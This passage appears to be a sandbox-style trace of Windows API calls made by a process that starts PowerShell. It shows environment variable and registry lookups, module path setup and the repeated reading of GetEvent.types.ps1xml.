0x0 [0246.856] CoTaskMemFree (pv=0x343980) [0246.857] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.858] CoTaskMemFree (pv=0x343980) [0247.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0247.741] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0247.741] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0247.741] CoTaskMemFree (pv=0x343980) [0247.748] CoTaskMemAlloc (cb=0xcc) returned 0x379470 [0247.748] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x379470, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0247.748] CoTaskMemFree (pv=0x379470) [0247.748] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d388 | out: phkResult=0x16d388*=0x1c4) returned 0x0 [0247.748] RegQueryValueExW (in: hKey=0x1c4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d30c, lpData=0x0, lpcbData=0x16d308*=0x0 | out: lpType=0x16d30c*=0x2, lpData=0x0, lpcbData=0x16d308*=0x6c) returned 0x0 [0247.749] CoTaskMemAlloc (cb=0x70) returned 0x399290 [0247.749] RegQueryValueExW (in: hKey=0x1c4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d2dc, lpData=0x399290, lpcbData=0x16d2d8*=0x6c | out: lpType=0x16d2dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d2d8*=0x6c) returned 0x0 [0247.749] CoTaskMemFree (pv=0x399290) [0247.749] CoTaskMemAlloc (cb=0xcc) returned 0x379470 [0247.749] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x379470, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0247.749] CoTaskMemFree (pv=0x379470) [0247.749] CoTaskMemAlloc (cb=0xcc) returned 0x379470 [0247.750] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x379470, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0247.750] CoTaskMemFree (pv=0x379470) [0247.754] RegCloseKey (hKey=0x1c4) returned 0x0 [0247.754] CoTaskMemAlloc (cb=0xcc) returned 0x379470 [0247.754] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x379470, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0247.754] CoTaskMemFree (pv=0x379470) [0247.754] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d388 | out: phkResult=0x16d388*=0x1c4) returned 0x0 [0247.755] RegQueryValueExW (in: hKey=0x1c4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d30c, lpData=0x0, lpcbData=0x16d308*=0x0 | out: lpType=0x16d30c*=0x0, lpData=0x0, lpcbData=0x16d308*=0x0) returned 0x2 [0247.755] RegCloseKey (hKey=0x1c4) returned 0x0 [0247.783] CoTaskMemAlloc (cb=0x20c) returned 0x32dfd0 [0247.783] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x32dfd0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0247.786] CoTaskMemFree (pv=0x32dfd0) [0247.786] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0247.787] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0247.796] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0247.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0247.797] CoTaskMemFree (pv=0x343980) [0247.798] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0247.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0247.798] CoTaskMemFree (pv=0x343980) [0247.805] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0247.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0247.806] CoTaskMemFree (pv=0x343980) [0247.806] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0247.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0247.806] CoTaskMemFree (pv=0x343980) [0247.815] CoTaskMemAlloc (cb=0x78) returned 0x399290 [0247.815] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d0cc, lpData=0x399290, lpcbData=0x16d0c8*=0x74 | out: lpType=0x16d0cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d0c8*=0x74) returned 0x0 [0247.815] CoTaskMemFree (pv=0x399290) [0247.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0247.815] SetErrorMode (uMode=0x1) returned 0x1 [0247.815] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d050 | out: lpFileInformation=0x16d050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0247.815] SetErrorMode (uMode=0x1) returned 0x1 [0247.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0247.819] SetErrorMode (uMode=0x1) returned 0x1 [0247.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d050 | out: lpFileInformation=0x16d050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0247.820] SetErrorMode (uMode=0x1) returned 0x1 [0247.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0247.824] SetErrorMode (uMode=0x1) returned 0x1 [0247.824] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d050 | out: lpFileInformation=0x16d050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0247.825] SetErrorMode (uMode=0x1) returned 0x1 [0247.832] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0247.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0247.832] CoTaskMemFree (pv=0x343980) [0247.842] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0247.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0247.842] CoTaskMemFree (pv=0x343980) [0247.843] GetACP () returned 0x4e4 [0247.868] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330 [0247.870] GetFileType (hFile=0x330) returned 0x1 [0247.870] SetErrorMode (uMode=0x1) returned 0x1 [0247.870] GetFileType (hFile=0x330) returned 0x1 [0247.886] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf00 | out: lpFileInformation=0x16cf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0247.886] SetErrorMode (uMode=0x1) returned 0x1 [0247.906] CoTaskMemAlloc (cb=0x5a) returned 0x1ba34dc0 [0247.906] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf3c, lpData=0x1ba34dc0, lpcbData=0x16cf38*=0x56 | out: lpType=0x16cf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cf38*=0x56) returned 0x0 [0247.907] CoTaskMemFree (pv=0x1ba34dc0) [0249.785] GetSystemInfo (in: lpSystemInfo=0x16bc20 | out: lpSystemInfo=0x16bc20*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0249.787] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0249.933] SetErrorMode (uMode=0x1) returned 0x1 [0249.935] SetErrorMode (uMode=0x1) returned 0x1 [0249.935] GetFileType (hFile=0x330) returned 0x1 [0249.935] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.941] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.942] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.942] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.942] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.943] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.943] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.943] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.943] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.944] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.944] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.944] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.945] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.945] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.945] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.945] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.946] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.947] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.947] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.947] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.948] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.948] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.948] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.948] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.949] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.949] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.949] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.949] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.950] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.950] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.950] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.950] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.951] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.955] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: lpBuffer=0x305b818*, lpNumberOfBytesRead=0x16cf88*=0x1000, lpOverlapped=0x0) returned 1 [0249.956] ReadFile (in: hFile=0x330, lpBuffer=0x305b818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cf88, lpOverlapped=0x0 | out: 